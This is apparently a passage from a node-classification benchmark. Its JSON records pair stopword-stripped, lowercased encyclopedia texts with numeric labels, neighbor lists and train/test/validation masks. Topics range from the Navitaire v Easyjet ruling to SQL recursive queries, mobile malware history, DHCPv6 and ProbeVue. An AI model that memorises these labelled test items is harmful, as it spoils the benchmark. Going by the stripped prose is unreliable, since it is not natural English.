    "text": "Navitaire_Inc_v_Easyjet_Airline_Co._and_BulletProof_Technologies,_Inc.:navitaire inc v easyjet airline co. bulletproof technologies inc. navitaire inc v easyjet airline co. bulletproof technologies inc. decision england wales high court justice chancery division case involved copyright infringement claim brought navitaire inc. navitaire easyjet airline company easyjet bulletproof technologies inc. bulletproof regards software used construct airline booking ticket reservation system curiously claimed defendant access original source code defendant source code resembled plaintiff way case affirms source code object code program i.e underlying framework may protected copyright programming language used create program well program functional aspects interfaces protected computer programs unique one achieve similar end result different means however artistic aspects may protected copyright subsists visual images created icons graphical user interfaces guis directive legal protection computer programs apply images specific case held writing original source code results similar identical function another program result infringement program navitaire also confirmed notion injunction would granted n't oppressive navitaire court approach confirmed opinions court appeals 2007 decision nova productions limited vs. mazooma games limited court held program infringe another produces similar results different underlying source code henry carr qc mark vanhegan anna edwards-stuart instructed field fisher waterhouse claimants richard arnold qc brian nicholson instructed herbert smith defendants claimant navitaire inc. navitaire developed system called openres ticketless airline booking application used number airlines users receive ticket given single reference number check-in airport navitaire owns copyright various works make source code openres software openres predominantly coded cobol navitaire predecessors open skies inc. open skies division hewlett packard open skies coded developed web interface openres called takeflight court refers navitaire open skies inc. collectively navitaire takeflight module consists source code navitaire developed airline booking system called openres predecessor open skies licensed software easyjet easyjet access underlying code navitaire suggest easyjet bulletproof access openres however studying functionality openres easyjet bulletproof developed system called eres also web interface substantially indistinguishable openres easyjet dispute allegation wanted new system substantially indistinguishable openres interface also disputed underlying code eres resemble openres codes easyjet created program studying observing navitaire system worked although code different eres acts upon identical similar inputs produces similar results openres thus navitaire filed action copyright law based alleging copyright infringement based non-textual copying specifically navitaire claimed similarity business logic overall look feel software functionality software rose level non-textual copying also regards takeflight known easyjet copied modified several occasions fix bugs provide display promotions etc provide foreign language interfaces code internationalized navitaire alleges easyjet breached license alleging non-textual copying software easyjet produced user interface look feel takeflight general matter court stated emulate action piece software writing software internal similarity first deliberately designed 'look achieve results far uncommon navitaire right far-reaching submission much work may amount infringement copyright original computer program even alleged infringer access source code investigate decompile executable program non-textual copying raised access issue three aspects non-contextual copying openres system consists database well series programs manipulate data interface consists single complex commands entered user relevant display screens different interfaces regards databases navitaire claimed copyright infringement occurred two points 1 transferring 'migrating data contained openres databases new easyres system easyjet made interim copies existing openres databases granted permission 2 easyjet bulletproof used knowledge openres databases design eres databases infringed copyright structure program court find infringement since databases manipulated way openres navitaire alleged eres violated copyright replicated overall look feel software i.e business logic relied required identical similar commands entered operator openres system copying icons displayed gui copying text-based screen displays well results produced software four classes relevant copyright works identified summary issues follows navitaire contend copyright subsists command set copyright work distinct source code claim number aspects collection commands whole entitled copyright 'compilation ii commands copyright work right iii alternatively 'complex commands work right displays navitaire contend respect vt100 screen displays 'template fixed data layout variable data separate copyright work display ii certain gui screens separate schedule maintenance module copyright works stand copied said quite distinct allegation similarity exhibited eres openres eye user 'non-textual copying whole source code said strictly analogous taking plot book 12 author takes plot another work copies nothing else still infringe copyright substantial part earlier author work represented plot goes computer programs john richardson computers v flanders 1993 fsr 497 ferris j easyjet accepts copyright subsists source code openres however stressed court regards user interface question considered whether substantial part taken since none code directly copied eres used command names substantial part source code agree copyright subsists command set either individual commands compilation since works begin moreover graphical displays also works contended non-contextual copying would extend protection copyright matters legitimately covered copyright argued claim went functional idea program rather expression idea software 1 comes computer programs copyright law protect non-textual copying long underlying source code different problem ultimate look feel similar present case fact easyjet n't access aided court finding infringement moreover court took account peculiar aspect computer programs several different ways producing similar identical result business logic i.e functionality program protected copyright law finding otherwise would extend copyright unjustifiably based navitaire merely copying look feel program website rise level infringement copyright using underlying ideas principles without copying actual expression source code infringe another even functionality however appearance may argued infringing artistic work see details metaphor navitaire urged easyjet studying openres system functionality resulted taking substantial part source code similar reading novel taking plot using plot new novel however court disagreed reasoning found computer programs code like novel instead court found case like chef invents pudding using different recipe original derives similar result one chef several tries comes tasty pudding dish writes recipe another chef tries decides recreate comes recipe would considered infringement although results means derive different 2 single words complex commands compilation commands qualify literary works single word commands qualify literary works necessary qualities literary work based 1988 act test considered merely whether written artefact accorded status copyright work regard kind skill labour expended nature copyright protection underlying policy complex commands i.e commands syntax one arguments must expressed particular way also qualify 1988 act mandates literary work written recorded moreover recitals 13-15 software directive reinforce computer languages may copyrighted present case identifiable literary work embodied command codes similarly collections commands count language protected compilation protection computer program may extended functionality alone copyright protection computer software given feel courts astute extend protection region functional effects program issue respectable case saying copyright general concerned functional effects advantage bright line rule protecting claimant embodiment function software superset software case truly analogous plot novel plot part work user interface part work one could permute letters codes command names would still work way would lost modest mnemonic advantage approach problem way may least consistent distinction idea expression finds way software directive course draws line idea expression particular place would say lies far side expression think however independence particular form actual codes used overall functioning software legitimate separate way afford separate protection underlying software even arguably copied 3 yes artistic work rise level copyright protection present case vt100 screen displays rise level considered tables found literary character based article 1 2 directive simply ideas underlying computer program interfaces providing merely static framework display dynamic data task software produce however graphic user interfaces guis icons qualified artistic works given protection due skill labour required arrange screens certain way icons copyrighted works court found since icons used guis copyrighted works easyjet made identical copies easyjet infringed navitaire copyright easyjet managed convince court licensees permitted alter modify program resolve bugs make modifications hired however court found infringement database fields reproduced unnecessarily us uk copyright grants protection expression idea idea database right according european union property right eu defined directive 96/9/ec directive legal protection databases passed 11 march 1996 affords legal protection databases granting specific separate legal rights limitations computer records rights collectively known database rights see full text court analyzed section making clear important dichotomy copyright law ideas protected expression thus code written protected interfaces function programming language see full text 3.— 1 part— literary work means work dramatic musical work written spoken sung accordingly includes— table compilation database b computer program c preparatory design material computer program database 2 copyright subsist literary dramatic musical work unless recorded writing otherwise references part time work made time recorded 50ba.— 1 infringement copyright lawful user computer program observe study test functioning program order determine ideas principles underlie element program performing acts loading displaying running transmitting storing program entitled 2 act permitted section irrelevant whether exists term condition agreement purports prohibit restrict act terms virtue section 296a void intellectual property",
    "neighbors": [
      3888,
      385
    ],
    "mask": "None"
  },
  {
    "node_id": 10137,
    "label": 1,
    "text": "Hierarchical_and_recursive_queries_in_SQL:hierarchical recursive queries sql hierarchical query type sql query handles hierarchical model data special cases general recursive fixpoint queries compute transitive closures standard hierarchical queries implemented way recursive common table expressions ctes unlike oracle earlier connect-by clause recursive ctes designed fixpoint semantics beginning recursive ctes standard relatively close existing implementation ibm db2 version 2 recursive ctes also supported microsoft sql server since sql server 2008 r2 firebird 2.1 postgresql 8.4+ sqlite 3.8.3+ ibm informix version 11.50+ cubrid mariadb 10.2+ mysql 8.0.1+ tableau documentation describing ctes used tibco spotfire support ctes oracle 11g release 2 implementation lacks fixpoint semantics without common table expressions connected-by clauses possible achieve hierarchical queries user-defined recursive functions common table expression cte sql temporary named result set derived simple query defined within execution scope codice_1 codice_2 codice_3 codice_4 statement ctes thought alternatives derived tables subquery views inline user-defined functions common table expressions supported teradata db2 firebird microsoft sql server oracle recursion since 11g release 2 postgresql since 8.4 mariadb since 10.2 mysql since 8.0 sqlite since 3.8.3 hypersql h2 experimental oracle calls ctes subquery factoring syntax recursive cte follows codice_5 ‘ syntax recursive ctes recursive subquery factoring oracle jargon used traverse relations graphs trees although syntax much involved automatic pseudo-columns created like codice_6 desired created code see msdn documentation ibm documentation tutorial examples codice_7 keyword usually needed systems postgresql sql:1999 recursive cte query may appear anywhere query allowed possible example name result using codice_8 codice_7 codice_10 using cte inside codice_11 one populate table data generated recursive query random data generation possible using technique without using procedural statements databases like postgresql support shorter create recursive view format internally translated recursive coding example recursive query computing factorial numbers 0 9 following alternative syntax non-standard codice_12 construct introduced oracle 1980s prior oracle 10g construct useful traversing acyclic graphs returned error detecting cycles version 10g oracle introduced nocycle feature keyword making traversal work presence cycles well codice_12 supported enterprisedb oracle database cubrid ibm informix db2 although enabled compatibility mode syntax follows output query would look like following example returns last name employee department 10 manager employee hierarchy number levels manager employee path two academic textbooks note cover sql:1999 standard datalog oracle extension",
    "neighbors": [
      10632,
      8201,
      9994,
      8979,
      2068,
      10389,
      4630,
      7446,
      2456,
      1049,
      5658,
      5403,
      10137,
      11030,
      4255,
      9631,
      1697,
      9634,
      11552,
      4263,
      2344,
      7080,
      5546,
      1579,
      9389,
      10286,
      10413,
      9397,
      5051,
      3004,
      10048,
      5953,
      6850,
      5061,
      9286,
      10953,
      9290,
      8788,
      2901,
      10326,
      987,
      2780,
      8539,
      4065,
      9828,
      10340,
      10471,
      8683,
      6124,
      2669,
      7022,
      6383,
      2544,
      10737,
      9075,
      1146,
      9471
    ],
    "mask": "Test"
  },
  {
    "node_id": 10138,
    "label": 2,
    "text": "CloudLinux_OS:cloudlinux os cloudlinux os linux distribution marketed shared hosting providers developed software company cloudlinux inc. cloudlinux os based centos operating system uses openvz kernel rpm package manager first version cloudlinux os released january 2010 operation system introduced compatibility red hat enterprise linux version 6 february 2011 version 7 april 2015 cloudlinux os provides modified kernel based openvz kernel adding set original fully functional solutions main feature lightweight virtual environment lve – separate environment cpu memory io iops number processes limits switching cloudlinux os performed provided cldeploy script installs kernel switches yum repositories installs basic packages allow lve work installation server requires rebooting load newly installed kernel cloudlinux os ’ modify existing packages possible boot previous kernel regular way",
    "neighbors": [
      5096,
      5067,
      9387,
      7983,
      5105,
      5363,
      5397,
      7483,
      318
    ],
    "mask": "None"
  },
  {
    "node_id": 10139,
    "label": 3,
    "text": "Intel_Dynamic_Acceleration:intel dynamic acceleration intel dynamic acceleration ida sometimes called dynamic acceleration technology dat technology created intel corp. certain multi-core intel microprocessors increases clock rate single core every two cores base operating frequency cores idle designed single threaded programs run faster multi-core intel microprocessors intel later released version ida called enhanced dynamic acceleration technology edat quad core processors boosts performance 2 cores 2 cores utilized intel dynamic acceleration first released core 2 duo mobile processor line new microprocessor lines released intel changed technology naming scheme slightly introduction quad core processors intel modified ida released dual dynamic acceleration dda later released nehalem microarchitecture intel microprocessors made additional changes original ida released improved version called intel turbo boost",
    "neighbors": [
      6339,
      4334,
      398,
      10675,
      2516,
      10966
    ],
    "mask": "None"
  },
  {
    "node_id": 10140,
    "label": 7,
    "text": "Joint_Enterprise_Defense_Infrastructure:joint enterprise defense infrastructure joint enterprise defense infrastructure jedi large united states department defense cloud computing contract reported worth 10 billion dollars companies interested contract included amazon google microsoft oracle rean cloud llc protests google employees google decided drop contention contract conflict corporate values deal considered gift-wrapped amazon oracle co-chaired safra catz contested awarding contract amazon web services led jeff bezos citing national defense authorization act idiq contracts conflicts interest deap ubhi worked amazon time department defense led eric g. bruggink senior judge united states court federal claims place contract award hold august 2019 weeks winner expected announced president donald trump ordered contract placed hold defense secretary mark esper investigate complaints favoritism towards amazon",
    "neighbors": [
      7248,
      8921,
      4194,
      8900
    ],
    "mask": "Test"
  },
  {
    "node_id": 10141,
    "label": 4,
    "text": "Mobile_malware:mobile malware mobile malware malicious software targets mobile phones wireless-enabled personal digital assistants pda causing collapse system loss leakage confidential information wireless phones pda networks become common grown complexity become increasingly difficult ensure safety security electronic attacks form viruses malware cell phone malware initially demonstrated brazilian software engineer marcos velasco created virus could used anyone order educate public threat first known mobile virus timofonica originated spain identified antivirus labs russia finland june 2000 timofonica sent sms messages gsm-capable mobile phones read spanish information telefónica fooling messages sent internet sms gateway movistar mobile operator june 2004 discovered company called ojam engineered anti-piracy trojan hack older versions mobile phone game mosquito sent sms texts company without user knowledge july 2004 computer hobbyists released proof-of-concept virus cabir infects mobile phones running symbian operating system spreading via bluetooth wireless march 2005 reported computer worm called commwarrior-a infecting symbian series 60 mobile phones specific worm replicated phone multimedia messaging service mms sending copies contacts listed phone user address book august 2010 kaspersky lab reported trojan trojan-sms.androidos.fakeplayer.a first sms malware affected google android operating system sent sms messages premium rate numbers without owner knowledge accumulating huge bills currently various antivirus software companies meanwhile operating system developers try curb spread infections quality control checks software content offered digital application distribution platforms google play apple app store recent studies however show mobile antivirus programs ineffective due rapid evolution mobile malware four types common malicious programs known affect mobile devices",
    "neighbors": [
      3072,
      7809,
      6786,
      11266,
      5764,
      901,
      7044,
      10245,
      10756,
      9227,
      9356,
      5261,
      9102,
      7441,
      8978,
      4863,
      4883,
      4245,
      278,
      8959,
      9233,
      10392,
      1690,
      3867,
      9242,
      5281,
      9761,
      2213,
      8998,
      9256,
      939,
      300,
      9771,
      7983,
      1970,
      4023,
      10297,
      3643,
      6588,
      7739,
      9791,
      1088,
      6653,
      3395,
      8387,
      4165,
      2508,
      9809,
      2259,
      10323,
      1622,
      3032,
      4314,
      7515,
      4957,
      8413,
      4344,
      9187,
      1892,
      3941,
      10341,
      9063,
      11621,
      107,
      877,
      9591,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 10142,
    "label": 9,
    "text": "POV-Ray:pov-ray persistence vision ray tracer pov-ray ray tracing program generates images text-based scene description available variety computer platforms originally based dkbtrace written david kirk buck aaron a. collins amiga computers also influences earlier polyray raytracer contributed author alexander enzmann pov-ray free open-source software source code available agplv3 sometime 1980s david kirk buck downloaded source code unix ray tracer amiga experimented eventually deciding write ray tracer named dkbtrace initials posted call ray bulletin board system chicago thinking others might interested 1987 aaron a. collins downloaded dkbtrace began working x86-based port david buck collaborated add several features program proved popular anticipated could keep demand features thus july 1991 david turned project team programmers working graphdev forum compuserve time felt inappropriate use initials program longer maintained name star-light software taskforce animation rendering initially used eventually name became pv-ray ultimately pov-ray persistence vision ray tracer inspired dali persistence memory 2002 pov-ray became first ray tracer render image orbit rendered mark shuttleworth inside international space station features application summary history discussed interview february 2008 david kirk buck chris cason episode 24 floss weekly pov-ray matured substantially since created recent versions software include following features one pov-ray main attractions large collection third party support large number tools textures models scenes tutorials found web also useful reference wanting learn ray tracing related geometry graphics algorithms work current official version pov-ray 3.7 version introduces main features previous release 3.6 july 2006 intel corporation started using beta version demonstrate new dual-core conroe processor due efficiency 3.7 beta smp implementation pov-ray addition standard geometric shapes like tori spheres heightfields supports mathematically defined primitives isosurface finite approximation arbitrary function polynomial primitive infinite object defined 15th order lower polynomial julia fractal 3-dimensional slice 4-dimensional fractal superquadratic ellipsoid intermediate sphere cube parametric primitive using equations represent surface rather interior pov-ray internally represents objects using mathematical definitions pov-ray primitive objects described mathematical functions different many 3d computer modeling packages typically use triangle meshes compose objects fact provides pov-ray several advantages disadvantages rendering modeling systems pov-ray primitives accurate polygonal counterparts objects described terms spheres planar surfaces cylinders tori like perfectly smooth mathematically accurate pov-ray renderings whereas polygonal artifacts may visible mesh-based modeling software pov-ray primitives also simpler define polygonal counterparts pov-ray sphere described simply center radius mesh-based environment sphere must described multitude small polygons hand primitive- script-based modeling always practical method create objects realistic characters complex man-made artifacts like cars objects created mesh-based modeling applications wings 3d blender converted pov-ray mesh format following example scene description language used pov-ray describe scene render demonstrates use background colour camera lights simple box shape surface normal finish transforming effects rotation following script fragment shows use variable declaration assignment comparison loop construct pov-ray program include modeling feature essentially pure renderer sophisticated model description language accompany feature set third parties developed large variety modeling software specialized pov-ray others supporting import export data structures including free open-source 3d creation suite blender number additional pov-ray compatible modelers linked povray.org modelling programs 2007 pov-ray acquired rights moray interactive 3-d modeling program long used pov-ray however december 2016 moray development stalled official modifications pov-ray source tree done and/or approved pov-team patch submission and/or bug reporting done pov-ray newsgroups news.povray.org news server web interface also available since pov-ray source available unofficial forks patched versions pov-ray available third parties however officially supported pov-team official pov-ray versions currently support shader plug-ins features like radiosity splines still development may subject syntactical change pov-ray 3.6 distributed compiled format macintosh windows linux support intel macs available macintosh version since mac os x version unix linux version compiled 3.7 versions smp support officially supported windows linux unofficial macintosh versions v3.7 found pov-ray ported platform compatible c++ compiler originally pov-ray distributed pov-ray license namely pov-ray 3.6 distribution license pov-ray 3.6 source license permitted free distribution program source code binaries restricts commercial distribution creation derivative works fully functional versions pov-ray although source code older versions available modification due 3.6 prior license restrictions open source free software according osi fsf definition term problem source code exchange greater foss ecosystem impossible due license incompatibility copyleft licenses one reasons pov-ray originally licensed free software gnu general public license gpl open source licenses pov-ray developed gpl-style licenses became widely used developers wrote license release pov-ray contributors software worked assumption contributions would licensed pov-ray 3.6 licenses 2013 version 3.7 pov-ray relicensed affero general public license version 3 later thus pov-ray since free software according fsf definition also open source software according open source definition",
    "neighbors": [
      1952,
      5410,
      6020,
      7301,
      9926,
      10153,
      10953,
      4331,
      5612,
      6797,
      7983,
      499,
      5492,
      3350,
      823,
      6553,
      8349
    ],
    "mask": "Train"
  },
  {
    "node_id": 10143,
    "label": 9,
    "text": "Operators_in_C_and_C++:operators c c++ list operators c c++ programming languages operators listed exist c++ fourth column included c states whether operator also present c. note c support operator overloading overloaded operators codice_1 codice_2 codice_3 comma operator sequence point evaluation first operand c++ also contains type conversion operators codice_4 codice_5 codice_6 codice_7 formatting operators means precedence level unimportant operators available c c++ also available languages c java perl php precedence associativity semantics purposes tables codice_8 codice_9 codice_10 represent valid values literals values variables return value object names lvalues appropriate codice_11 codice_12 codice_13 stand type codice_14 class type enumerated type notes following table lists precedence associativity operators c c++ languages operators also exist java perl php many recent languages precedence given operators listed top bottom descending precedence descending precedence refers priority grouping operators operands considering expression operator listed row grouped prior operator listed row operators cell may several rows operators listed cell grouped precedence given direction operator precedence unaffected overloading syntax expressions c c++ specified phrase structure grammar table given inferred grammar iso c 1999 standard section 6.5.6 note 71 states c grammar provided specification defines precedence c operators also states operator precedence resulting grammar closely follows specification section ordering c syntax i.e. grammar specifies precedence operators evaluation expression order major subclauses subclause highest precedence first precedence table mostly adequate resolve details particular note ternary operator allows arbitrary expression middle operand despite listed higher precedence assignment comma operators thus codice_15 interpreted codice_16 meaningless codice_17 expression middle conditional operator codice_18 codice_19 parsed parenthesized also note immediate unparenthesized result c cast expression operand codice_20 therefore codice_21 interpreted codice_22 codice_23 precedence table determines order binding chained expressions expressly specified parentheses many operators containing multi-character sequences given names built operator name character example codice_35 codice_36 often called plus equal minus equal instead verbose assignment addition assignment subtraction binding operators c c++ specified corresponding standards factored language grammar rather precedence table creates subtle conflicts example c syntax conditional expression c++ hence expression parsed differently two languages c expression syntax error syntax assignment expression c c++ parsed valid expression precedence bitwise logical operators criticized conceptually arithmetic operators like expression syntactically parsed whereas expression parsed requires parentheses used often otherwise would historically syntactic distinction bitwise logical operators bcpl b early c operators n't exist instead different meaning depending whether used ‘ truth-value context ’ i.e boolean value expected example behaved logical operator behaved bitwise one retained keep backward compatibility existing installations moreover c++ later versions c equality operations exception three-way comparison operator yield bool type values conceptually single bit 1 0 properly belong bitwise operations c++ defines certain keywords act aliases number operators used exactly way punctuation symbols replace operator different name rather simple token replacements name character string respective operator means expressions identical meanings also means example codice_37 keyword may used replace bitwise-and operator also address-of operator even used specify reference types e.g. iso c specification makes allowance keywords preprocessor macros header file compatibility c c++ provides header inclusion effect",
    "neighbors": [
      8582,
      1435,
      4267,
      2605,
      5165,
      5677,
      9008,
      8627,
      7479,
      8382,
      6338,
      8644,
      1349,
      8262,
      4173,
      11219,
      10075,
      1501,
      8545,
      10980,
      10470,
      240,
      6640,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10144,
    "label": 5,
    "text": "DHCPv6:dhcpv6 dynamic host configuration protocol version 6 dhcpv6 network protocol configuring internet protocol version 6 ipv6 hosts ip addresses ip prefixes configuration data required operate ipv6 network ipv6 equivalent dynamic host configuration protocol ipv4 ipv6 hosts may automatically generate ip addresses internally using stateless address autoconfiguration slaac may assigned configuration data dhcpv6 ipv6 hosts use stateless autoconfiguration may require information ip address route dhcpv6 used acquire information even though used configure ip addresses dhcpv6 necessary configuring hosts addresses domain name system dns servers configured using neighbor discovery protocol also mechanism stateless autoconfiguration many ipv6 routers routers residential networks must configured automatically operator intervention routers require ipv6 address use communicating upstream routers also ipv6 prefix use configuring devices downstream side router dhcpv6 prefix delegation provides mechanism configuring routers dhcpv6 uses udp port number 546 clients port number 547 servers dhcp unique identifier duid used client get ip address dhcpv6 server 2-byte duid type field variable-length identifier field 128 bytes actual length depends type server compares duid database delivers configuration data address lease times dns servers etc client first 16 bits duid contain duid type four types meaning remaining duid depends type four types identified rfc 8415 due fact difficult manage multiple identifiers dual-stack environment fact duid simply optimal situations rfc 6939 released giving way identify host based mac address defines way dhcpv6 relay pass information dhcpv6 server option dhcpv6 relays yet widely supported cisco brocade switches support option example without rapid-commit present server link-local address codice_1 client link-local address codice_2 lorenzo colitti google explained dhcpv6 implemented android",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      8080,
      3218,
      9365,
      10005,
      11413,
      5402,
      4891,
      5531,
      3742,
      10271,
      8482,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      3133,
      3006,
      5181,
      321,
      5437,
      6724,
      7364,
      2887,
      8265,
      2509,
      8654,
      4687,
      6993,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10461,
      10341,
      10344,
      11112,
      367,
      8432,
      7411,
      6651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10145,
    "label": 9,
    "text": "Data_type:data type computer science computer programming data type simply type attribute data tells compiler interpreter programmer intends use data programming languages support common data types real integer boolean data type constrains values expression variable function might take data type defines operations done data meaning data way values type stored type value expression may take value data types used within type systems offer various ways defining implementing using different type systems ensure varying degrees type safety almost programming languages explicitly include notion data type though different languages may use different terminology common data types include example java programming language type int represents set 32-bit integers ranging value −2,147,483,648 2,147,483,647 well operations performed integers addition subtraction multiplication colors hand represented three bytes denoting amounts red green blue one string representing color name allowable operations include addition subtraction multiplication programming languages also allow programmer define additional data types usually combining multiple elements types defining valid operations new data type example programmer might create new data type named complex number would include real imaginary parts data type also represents constraint placed upon interpretation data type system describing representation interpretation structure values objects stored computer memory type system uses data type information check correctness computer programs access manipulate data data types statistics comparable types computer programming vice versa shown following table identified five definitions type used—sometimes implicitly—in literature types including behavior align closely object-oriented models whereas structured programming model would tend include code called plain old data structures five types definition terms representation often done imperative languages algol pascal definition terms value space behaviour used higher-level languages simula clu primitive data types typically types built-in basic language implementation data computers based digital electronics represented bits alternatives 0 1 lowest level smallest addressable unit data usually group bits called byte usually octet 8 bits unit processed machine code instructions called word typically 32 64 bits instructions interpret word binary number 32-bit word represent unsigned integer values 0 formula_1 signed integer values formula_2 formula_3 two complement machine language machine n't need distinguish unsigned signed data types part floating point numbers used floating point arithmetic use different interpretation bits word see https //en.wikipedia.org/wiki/floating-point_arithmetic details machine data types need exposed made available systems low-level programming languages allowing fine-grained control hardware c programming language instance supplies integer types various widths codice_1 codice_2 corresponding native type exist target platform compiler break code using types exist instance 32-bit integer requested 16 bit platform compiler tacitly treat array two 16 bit integers higher level programming machine data types often hidden abstracted implementation detail would render code less portable exposed instance generic codice_3 type might supplied instead integers specific bit-width boolean type represents values true false although two values possible rarely implemented single binary digit efficiency reasons many programming languages explicit boolean type instead interpreting instance 0 false values true boolean data refers logical structure language interpreted machine language case boolean 0 refers logic false true always non zero especially one known boolean 1 composite types derived one primitive type done number ways ways combined called data structures composing primitive type compound type generally results new type e.g array-of-integer different type integer many others possible tend variations compounds example linked list store data array provides sequential access rather random built records dynamic memory though arguably data structure rather type per se also common distinct enough including discussion composite types justified enumerated type distinct values compared assigned necessarily particular concrete representation computer memory compilers interpreters represent arbitrarily example four suits deck playing cards may four enumerators named club diamond heart spade belonging enumerated type named suit variable v declared suit data type one assign four values implementations allow programmers assign integer values enumeration values even treat type-equivalent integers character string types store sequences characters character set ascii since character sets include digits possible numeric string codice_7 however many languages treat belonging different type numeric value codice_8 character string types different subtypes according required character width original 7-bit wide ascii found limited superseded 8 16-bit sets encode wide variety non-latin alphabets hebrew chinese symbols strings may either stretch-to-fit fixed size even programming language may also subtyped maximum size note strings primitive languages instance c composed array characters types based derived basic types explained languages c functions type derived type return value main non-composite derived type pointer data type whose value refers directly points another value stored elsewhere computer memory using address primitive kind reference everyday terms page number book could considered piece data refers another one pointers often stored format similar integer however attempting dereference look pointer whose value never valid memory address would cause program crash ameliorate potential problem pointers considered separate type type data point even underlying representation type specify implementation abstract data type instance stack abstract type implemented array contiguous block memory containing multiple values linked list set non-contiguous memory blocks linked pointers abstract types handled code know care underlying types contained programming agnostic concrete data types called generic programming arrays records also contain underlying types considered concrete specify contents elements laid memory examples include convenience high-level languages may supply ready-made real world data types instance times dates monetary values memory even language allows built primitive types type system associates types computed values examining flow values type system attempts prove type errors occur type system question determines constitutes type error type system generally seeks guarantee operations expecting certain kind value used values operation make sense compiler may use static type value optimize storage needs choice algorithms operations value many c compilers data type example represented 32 bits accord ieee specification single-precision floating point numbers thus use floating-point-specific microprocessor operations values floating-point addition multiplication etc. depth type constraints manner evaluation affect typing language programming language may associate operation varying concrete algorithms type case type polymorphism type theory study type systems although concrete type systems programming languages originate practical issues computer architecture compiler implementation language design type systems may variously static dynamic strong weak typing forth",
    "neighbors": [
      512,
      5635,
      4101,
      2062,
      5151,
      5677,
      2617,
      3642,
      8251,
      9794,
      8262,
      2632,
      1611,
      10326,
      9309,
      6239,
      8291,
      8295,
      8808,
      1131,
      9331,
      3702,
      2680,
      3705,
      1146,
      655,
      9875,
      5783,
      5796,
      10916,
      692,
      9397,
      3767,
      9921,
      6860,
      9932,
      7386,
      8926,
      7392,
      8421,
      5358,
      2800,
      5361,
      5872,
      2804,
      6906,
      8955,
      9466,
      5885,
      7421,
      1798,
      10510,
      10012,
      11552,
      5415,
      11574,
      4920,
      1343,
      9535,
      1349,
      10568,
      10569,
      8524,
      846,
      335,
      8539,
      7523,
      356,
      6502,
      8554,
      10097,
      2936,
      3960,
      380,
      3454,
      10624,
      8079,
      6032,
      5521,
      11154,
      11160,
      11674,
      11679,
      1952,
      8611,
      5546,
      428,
      1964,
      8117,
      9152,
      6085,
      6087,
      7627,
      11212,
      2010,
      4572,
      479,
      3554,
      4066,
      9714,
      3573,
      1019,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10146,
    "label": 3,
    "text": "Joe-E:joe-e joe-e subset java programming language intended support programming according object-capability discipline language notable early object-capability subset language influenced later subset languages adsafe caja/cajita subsets javascript also notable allowing methods verified functionally pure based method signatures restrictions imposed joe-e verifier include cup joe slang coffee serves trademark-avoiding reference java thus name joe-e intended suggest adaptation ideas e programming language create variant java language waterken server written joe-e",
    "neighbors": [
      256,
      9345,
      4034,
      7480,
      10813,
      2951,
      5503,
      5483,
      7884,
      5677,
      11596,
      10835,
      3700,
      10614,
      728,
      1114,
      6813,
      3999
    ],
    "mask": "Test"
  },
  {
    "node_id": 10147,
    "label": 5,
    "text": "TCP_Westwood:tcp westwood tcp westwood tcpw sender-side-only modification tcp new reno intended better handle large bandwidth-delay product paths large pipes potential packet loss due transmission errors leaky pipes dynamic load dynamic pipes tcp westwood relies mining ack stream information help better set congestion control parameters slow start threshold ssthresh congestion window cwin tcp westwood eligible rate estimated used sender update ssthresh cwin upon loss indication agile probing phase proposed modification well-known slow start phase addition scheme called persistent non congestion detection pncd devised detect persistent lack congestion induce agile probing phase expeditiously utilize large dynamic bandwidth resultant performance gains efficiency without undue sacrifice fairness friendliness stability reported numerous papers found tcp westwood home page significant efficiency gains obtained large leaky dynamic pipes maintaining fairness appropriate criterion friendliness i.e opportunistic friendliness tcp westwood shown good controllable friendliness tcp westwood plus evolution tcp westwood fact soon discovered westwood bandwidth estimation algorithm work well presence reverse traffic due ack compression tcp westwood+ version implemented linux kernel",
    "neighbors": [
      7017,
      10924,
      718
    ],
    "mask": "Test"
  },
  {
    "node_id": 10148,
    "label": 2,
    "text": "ProbeVue:probevue probevue ibm implementation lightweight dynamic tracing environment introduced aix version 6.1 probevue provides ability probe running processes order provide statistical analysis well retrieve data probed process dynamic nature probevue allows used global system performance tool retaining ability drill specific events single process thread modifications required probed process system lightweight design probevue tracing tool suitable use production environment previous tracing tools would performance prohibitive probevue provides series probe point specifications potential events probed script written vue language allows user define probe block code called action block run events occur system execution action block limited specific events use conditional statement placed probe called predicate code action block follows c-like syntax limited set built functions following example probe defined whenever process pid 123456 enters read system call event happens script call built-in printf function print message output trace buffers first line action block c-style comment therefore execute probevue environment probes like sample written run without extensive testing normally required production system probevue environment protects user errant code resource hungry tracing frequently seen previous ibm tracing tools runtime compile feature probevue provides powerful ad hoc environment data gathering currently ibm provides following probe providers aix 6.1 syscall uft interval trace probevue probes begin end syscall provider defines probe points subset available system calls user function tracing uft probes defined entry points functions defined c c++ program syscall uft probes must include valid function prototype vue script function parameters entry probes return values syscall exit probes accessed interval probes fire timer defined 100 millisecond intervals trace provider allows probevue access traditional trace hooks finally probevue probes called begin end fire probevue environment starts exits probevue designed tool monitor operating system events vue language uses event driven style used describe process data derived events like dynamic tracing languages found unices vue language c-like syntax frequently presented context vue relationship c many parallels deviates significantly imperative nature c. contrasts similarities shown probevue used monitor applications written primarily c supports c data types well c data structures vue also supports string list time stamp data types string list types actually arrays time stamp high resolution representation point time type casting automatic type promotion operations mixed types similar c behavior well pointers arrays data structures behave probevue would c program key difference c pointers refer location memory referencing location another process space access memory necessary first copy memory location local probevue environment memory paged probevue force page fault access another difference size pointers c determined compile time probevue determined 32 64 bitness application probed floating point data types valid data types assignment probed process used floating point mathematical operations vue uses scoping rules similar c must also account externally derived nature much data probes result data classes available relevant probes portions view script basic classifications data follows vue operators follow c conventions closely exception used strings used strings operator performs concatenation == operator used comparisons vue allow definition user functions recursion looping constructs offer conditional if-then expressions within probe action block lightweight nature probevue prohibits vue script defining expensive looping extensive branching operations could degrade performance tentative tracing concept allows trace output block code labeled tentative output code later committed trace buffers visible output discarded works conceptually much like transaction controls sql vue script invoked interpreter magic set executable like shell script run input probevue command form command line parameter stdin input convention vue scripts .e filename extension vue language lacks aggregations instead uses list data type offers similar yet limited functionality equivalent product solaris called dtrace offers aggregation data type powerful set aggregating functions represent statistical data list data type offers basic aggregating functions single item opposed associative arrays aggregations dtrace offers list data type offers slight simplification keeping stats manually allow list reset say interval easily done using manual summaries basic types 